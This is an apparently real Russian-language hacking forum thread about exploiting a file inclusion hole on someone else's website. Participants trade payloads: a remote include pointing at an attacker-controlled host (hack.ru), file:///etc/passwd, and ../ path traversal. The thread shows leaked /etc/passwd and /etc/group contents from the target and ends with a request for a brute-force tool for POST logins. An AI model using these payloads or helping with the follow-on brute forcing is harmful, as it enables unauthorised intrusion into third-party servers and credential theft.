Такая трабла есть инклуд.Похож на RFI.Допустим перехожу site.com/blablabla=http://hack.ru/phpinfo.php открывает пхп инфо моего сайта(hack).

Так и должно быть.. Ну не совсем может там не инклуд вовсе

Ну а как мне увидить phpinfo атакуемого сайта?

а зачем тебе phpinfo атакуемого сайта?

вопрос вообще про инклуд сначала был

/etc/shells /etc/passwd по классике попробуй проинклудить

Так если у него инклуд нахрена это всё,тем более если РФИ

site.com/blablabla=

site=i.txt

в i.txt

а что если, file:///etc/passwd || http://127.0.0.1:80

в i.txt - открыл как текстовый тхт.

file:///etc/passwd || http://127.0.0.1:80 - нет результатов(((

тогда это не инклуд

так ты файл читать можешь локальный?

file:///etc/passwd

/blablabla=../etc/passwd

file:///etc/passwd да вот только что нашел,ток в другом месте

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

/etc/group

crontab:x:102:

Debian-exim:x:103:

mlocate:x:104:

ssh:x:105:

А есть брут??работающий с post запросами?